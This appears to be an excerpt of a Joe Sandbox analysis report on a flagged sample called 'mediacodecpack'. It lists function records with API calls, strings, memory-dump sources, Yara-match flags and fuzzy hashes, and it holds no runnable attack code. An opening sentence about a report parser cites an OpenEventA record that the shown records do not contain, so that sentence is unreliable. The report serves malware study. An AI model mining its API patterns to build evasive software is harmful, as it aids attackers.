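Feed it the text of a saved report (e.g. `parse_blocks(open("report.txt", encoding="utf-8").read())`) and query the result: `find_blocks_calling(blocks, {"CreateEventA", "WaitForSingleObject"})` returns the named-event record, `decode_event_access(blocks[0]["apis"][0]["args"][0])` yields `['EVENT_MODIFY_STATE', 'SYNCHRONIZE']` for the OpenEventA call, and the "API String ID" / fuzzy-hash values in each record's `meta` can be compared across reports to spot reused functions.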
                                                                                            APIs
                                                                                            • sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                              • Part of subcall function 60962F28: sqlite3_log.SQLITE3 ref: 60962F5D
                                                                                            • sqlite3_mprintf.SQLITE3 ref: 60963534
                                                                                            • sqlite3_blob_open.SQLITE3 ref: 6096358B
                                                                                            • sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                            • sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                            • sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                            • sqlite3_free.SQLITE3 ref: 60963621
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_blob_bytessqlite3_blob_opensqlite3_blob_readsqlite3_blob_reopensqlite3_freesqlite3_logsqlite3_mallocsqlite3_mprintf
                                                                                            • String ID:
                                                                                            • API String ID: 4276469440-0
                                                                                            • Opcode ID: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction ID: 177081cd506585250240414a33056f89eeda992db91a315aff795e5fc91eaf1e
                                                                                            • Opcode Fuzzy Hash: 81f80890dbec9a3991ff68d8cfcbb164f6b4d7f09a97d6cb6c54cb11191f3d09
                                                                                            • Instruction Fuzzy Hash: C641E5B09087059FDB40DF29C48179EBBE6AF98354F01C87AE898DB354E734D841DB92
                                                                                            APIs
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A240
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A24E
                                                                                            • sqlite3_value_bytes.SQLITE3 ref: 6091A25A
                                                                                            • sqlite3_value_text.SQLITE3 ref: 6091A27C
                                                                                            Strings
                                                                                            • ESCAPE expression must be a single character, xrefs: 6091A293
                                                                                            • LIKE or GLOB pattern too complex, xrefs: 6091A267
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text$sqlite3_value_bytes
                                                                                            • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                            • API String ID: 4080917175-264706735
                                                                                            • Opcode ID: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction ID: 7e7232241edcba55bc41816b79a09feadaac9d75cc2fb544db44a2248cbef301
                                                                                            • Opcode Fuzzy Hash: e5bda90e0e0ba1860c41bc069fb20e3a267b2c9271c0a370806f06164fd47fa4
                                                                                            • Instruction Fuzzy Hash: A4214C74A182198BCB00DF79C88165EBBF6FF64354B108AA9E864DB344E734DCC6CB95
                                                                                            APIs
                                                                                              • Part of subcall function 6092506E: sqlite3_log.SQLITE3 ref: 609250AB
                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 609250E7
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 60925100
                                                                                            • sqlite3_value_text16.SQLITE3 ref: 6092512C
                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 6092513E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                             • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_value_text16$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                            • String ID: library routine called out of sequence$out of memory
                                                                                            • API String ID: 2019783549-3029887290
                                                                                            • Opcode ID: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction ID: f6310061860eb79c45c0a7b6efb00bde58ba827c5a391e7df96a4cb3fbc4cfa9
                                                                                            • Opcode Fuzzy Hash: bf8b25fefa583efc99e02b0fe9019e927645d1a19242a42ec125398c6bed8d9e
                                                                                            • Instruction Fuzzy Hash: 81014C70A083049BDB14AF69C9C170EBBE6BF64248F0488A9EC958F30EE775D8818B51
                                                                                            APIs
                                                                                            • __init_pointers.LIBCMT ref: 02D54A04
                                                                                              • Part of subcall function 02D570C0: RtlEncodePointer.NTDLL(00000000), ref: 02D570C3
                                                                                              • Part of subcall function 02D570C0: __initp_misc_winsig.LIBCMT ref: 02D570DE
                                                                                              • Part of subcall function 02D570C0: GetModuleHandleW.KERNEL32(kernel32.dll,?,02D6F248,00000008,00000003,02D6EC8C,?,00000001), ref: 02D57E41
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D57E55
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D57E68
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D57E7B
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D57E8E
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D57EA1
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D57EB4
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D57EC7
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D57EDA
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D57EED
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D57F00
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D57F13
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D57F26
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D57F39
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D57F4C
                                                                                              • Part of subcall function 02D570C0: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D57F5F
                                                                                            • __mtinitlocks.LIBCMT ref: 02D54A09
                                                                                            • __mtterm.LIBCMT ref: 02D54A12
                                                                                              • Part of subcall function 02D54A7A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D574F6
                                                                                              • Part of subcall function 02D54A7A: _free.LIBCMT ref: 02D574FD
                                                                                              • Part of subcall function 02D54A7A: RtlDeleteCriticalSection.NTDLL(02D71978), ref: 02D5751F
                                                                                            • __calloc_crt.LIBCMT ref: 02D54A37
                                                                                            • __initptd.LIBCMT ref: 02D54A59
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02D54A60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                            • String ID:
                                                                                            • API String ID: 3567560977-0
                                                                                            • Opcode ID: 43220e355fa7f09756da57e8f51c391a5e52d83ff89fe09e7a606a33127ebacf
                                                                                            • Instruction ID: b385b743718d9bcfec691109ea56aba205e7ac688cfa00b9357e1e2be5c8821c
                                                                                            • Opcode Fuzzy Hash: 43220e355fa7f09756da57e8f51c391a5e52d83ff89fe09e7a606a33127ebacf
                                                                                            • Instruction Fuzzy Hash: B5F08C3254863119EEA47E38780666A6692DB01338F204A19EC25953C4FF908C819966
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02D52483,00000000), ref: 02D524EB
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D524F2
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02D524FE
                                                                                            • RtlDecodePointer.NTDLL(00000001), ref: 02D5251B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                            • String ID: RoInitialize$combase.dll
                                                                                            • API String ID: 3489934621-340411864
                                                                                            • Opcode ID: 65cd9ab4c0fb68eb6d98caf05009cc2f9e7bb91aebc3203160c3fc7f54e852de
                                                                                            • Instruction ID: d25dda91014151a9d12ca5990b782714afacb7338cad8d839a818b5fc450c2bd
                                                                                            • Opcode Fuzzy Hash: 65cd9ab4c0fb68eb6d98caf05009cc2f9e7bb91aebc3203160c3fc7f54e852de
                                                                                            • Instruction Fuzzy Hash: BBE0ED71DD4200ABEF211BB0FC5DB143BB4A740746F605824F506D5384D7BC9CAC8A60
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D524C0), ref: 02D525C0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 02D525C7
                                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 02D525D2
                                                                                            • RtlDecodePointer.NTDLL(02D524C0), ref: 02D525ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                            • API String ID: 3489934621-2819208100
                                                                                            • Opcode ID: a36643f0005cbe17366cbfbd61eaa013447067738aac570375cec982033b48b9
                                                                                            • Instruction ID: 6d6a9d069226b473c1094d88d2140f887ca3b8bd84500e9a1246f8b475bd9104
                                                                                            • Opcode Fuzzy Hash: a36643f0005cbe17366cbfbd61eaa013447067738aac570375cec982033b48b9
                                                                                            • Instruction Fuzzy Hash: 06E092B09C0200ABEB215B64F81DB143B78B705705F601814F506A6384EBBC9CBC8A60
                                                                                            APIs
                                                                                            • TlsGetValue.KERNEL32(0000002B,96605425,?,?,?,?,00000000,02D640D8,000000FF,02D511DA), ref: 02D50F7A
                                                                                            • TlsSetValue.KERNEL32(0000002B,02D511DA,?,?,00000000), ref: 02D50FE7
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D51011
                                                                                            • HeapFree.KERNEL32(00000000), ref: 02D51014
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: HeapValue$FreeProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1812714009-0
                                                                                            • Opcode ID: b6ce0349b7c34b39ff236d8fbe5b0aafaefc410fe07dcae9028e3fc340024546
                                                                                            • Instruction ID: 17613c7d2b6fe276c23ca0d027bb2469dde9003fa553ba96cc81c80405f9462b
                                                                                            • Opcode Fuzzy Hash: b6ce0349b7c34b39ff236d8fbe5b0aafaefc410fe07dcae9028e3fc340024546
                                                                                            • Instruction Fuzzy Hash: E351C0319043A49FDB20DF28D848B16BBE4EF49764F298658ED59A7380D7B5EC04CB91
                                                                                            APIs
                                                                                            • _ValidateScopeTableHandlers.LIBCMT ref: 02D62DB0
                                                                                            • __FindPESection.LIBCMT ref: 02D62DCA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FindHandlersScopeSectionTableValidate
                                                                                            • String ID:
                                                                                            • API String ID: 876702719-0
                                                                                            • Opcode ID: acdabba5b3f61fc306a798289f2dcb3e3ec69d5db648b5b3a844da9045619bd7
                                                                                            • Instruction ID: 1a05e07ae590e55df5e073c1d64840a5a50f0b9c69d9954ac3fcdceed19fb933
                                                                                            • Opcode Fuzzy Hash: acdabba5b3f61fc306a798289f2dcb3e3ec69d5db648b5b3a844da9045619bd7
                                                                                            • Instruction Fuzzy Hash: C9A1BC71E002158FCB25CF58D88CBB9B7A5FB48364F59462ADC45AB391E735ED40CBA0
                                                                                            APIs
                                                                                            • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                              • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                            • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                            • String ID: List of tree roots: $d$|
                                                                                            • API String ID: 3709608969-1164703836
                                                                                            • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                            • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                            • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                            • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                            APIs
                                                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D41CB1
                                                                                            • CloseHandle.KERNEL32(?), ref: 02D41CBA
                                                                                            • InterlockedExchangeAdd.KERNEL32(02D75264,00000000), ref: 02D41CC6
                                                                                            • TerminateThread.KERNEL32(?,00000000), ref: 02D41CD4
                                                                                            • QueueUserAPC.KERNEL32(02D41E7C,?,00000000), ref: 02D41CE1
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D41CEC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                            • String ID:
                                                                                            • API String ID: 1946104331-0
                                                                                            • Opcode ID: 330c35c9d725b7e4da442e9c8079353ec1acd55550fc4b172473906f7a05a6fd
                                                                                            • Instruction ID: f54c007c73b19fee1080a92ed8362741f5012d067c181991bb3aadc6da43065a
                                                                                            • Opcode Fuzzy Hash: 330c35c9d725b7e4da442e9c8079353ec1acd55550fc4b172473906f7a05a6fd
                                                                                            • Instruction Fuzzy Hash: D4F08C35940200BFE7205B96EC0DE5BBBBCEB867217504619F56A82290DB70EC90CBB0
                                                                                            APIs
                                                                                              • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
                                                                                              • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
                                                                                              • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
                                                                                              • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609600BA
                                                                                            • sqlite3_column_text.SQLITE3 ref: 609600EF
                                                                                            • sqlite3_free.SQLITE3 ref: 6096029A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
                                                                                            • String ID: e
                                                                                            • API String ID: 786425071-4024072794
                                                                                            • Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                            • Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
                                                                                            • Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
                                                                                            • Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_exec
                                                                                            • String ID: sqlite_master$sqlite_temp_master$|
                                                                                            • API String ID: 2141490097-2247242311
                                                                                            • Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                            • Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
                                                                                            • Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
                                                                                            • Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
                                                                                            APIs
                                                                                            • std::exception::exception.LIBCMT ref: 02D5098F
                                                                                              • Part of subcall function 02D514E3: std::exception::_Copy_str.LIBCMT ref: 02D514FC
                                                                                              • Part of subcall function 02D4FD60: __CxxThrowException@8.LIBCMT ref: 02D4FDBE
                                                                                            • std::exception::exception.LIBCMT ref: 02D509EE
                                                                                            Strings
                                                                                            • boost unique_lock has no mutex, xrefs: 02D5097E
                                                                                            • $, xrefs: 02D509F3
                                                                                            • boost unique_lock owns already the mutex, xrefs: 02D509DD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                            • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                            • API String ID: 2140441600-46888669
                                                                                            • Opcode ID: e6d9e3735ff365889277b9bb8ddff4f1a020102819db173fc1043069e3ed78da
                                                                                            • Instruction ID: dac0248bd49164288231e32b61e7be5176ae2fa967f4feef4e7ebac1c2dab7cf
                                                                                            • Opcode Fuzzy Hash: e6d9e3735ff365889277b9bb8ddff4f1a020102819db173fc1043069e3ed78da
                                                                                            • Instruction Fuzzy Hash: D921D7719083909FD720DF24C558B5BBBE9BB89B08F404A5DF8A587790D7B9D808CF92
                                                                                            APIs
                                                                                            • __getptd_noexit.LIBCMT ref: 02D536F0
                                                                                              • Part of subcall function 02D548E2: GetLastError.KERNEL32(75570A60,7556F550,02D54AD0,02D52043,7556F550,?,02D45A0D,00000104,75570A60,7556F550,ntdll.dll,?,?,?,02D45EE8), ref: 02D548E4
                                                                                              • Part of subcall function 02D548E2: __calloc_crt.LIBCMT ref: 02D54905
                                                                                              • Part of subcall function 02D548E2: __initptd.LIBCMT ref: 02D54927
                                                                                              • Part of subcall function 02D548E2: GetCurrentThreadId.KERNEL32 ref: 02D5492E
                                                                                              • Part of subcall function 02D548E2: SetLastError.KERNEL32(00000000,02D45A0D,00000104,75570A60,7556F550,ntdll.dll,?,?,?,02D45EE8), ref: 02D54946
                                                                                            • __calloc_crt.LIBCMT ref: 02D53713
                                                                                            • __get_sys_err_msg.LIBCMT ref: 02D53731
                                                                                            • __invoke_watson.LIBCMT ref: 02D5374E
                                                                                            Strings
                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D536FB, 02D53721
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                            • API String ID: 109275364-798102604
                                                                                            • Opcode ID: 09cde912488132102ee5e96ae2ac18318d76545c8eb8986bdfa4a6c60097c0bf
                                                                                            • Instruction ID: 2777f83cd3386d4c6f86c7ba8bea0ddc57eee294ec9c34b06f1d68d4263f4227
                                                                                            • Opcode Fuzzy Hash: 09cde912488132102ee5e96ae2ac18318d76545c8eb8986bdfa4a6c60097c0bf
                                                                                            • Instruction Fuzzy Hash: 76F0E9B6D0473477AF62352A9C41A3B72CDDB447E0F0000A6FE8496300EBD5DC0086E5
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42350
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42360
                                                                                            • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D42370
                                                                                            • GetLastError.KERNEL32 ref: 02D4237A
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID: pqcs
                                                                                            • API String ID: 1619523792-2559862021
                                                                                            • Opcode ID: eff6d5a12aa5335dcca8184bf60885c26ce100fd0ac4aebc32aec27612d4ebf1
                                                                                            • Instruction ID: f8377ee688411ca6591ad0bca646bae9a78a8d629f78c2015fd2ac824c6b86db
                                                                                            • Opcode Fuzzy Hash: eff6d5a12aa5335dcca8184bf60885c26ce100fd0ac4aebc32aec27612d4ebf1
                                                                                            • Instruction Fuzzy Hash: 91F03A71A40304AFDB20AFA4A80DFAB7BBCEB01705F500969F985D6340EB70DD94CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44035
                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02D44042
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02D44049
                                                                                            • std::exception::exception.LIBCMT ref: 02D44063
                                                                                              • Part of subcall function 02D496CE: __EH_prolog.LIBCMT ref: 02D496D3
                                                                                              • Part of subcall function 02D496CE: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D496E2
                                                                                              • Part of subcall function 02D496CE: __CxxThrowException@8.LIBCMT ref: 02D49701
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3112922283-2104205924
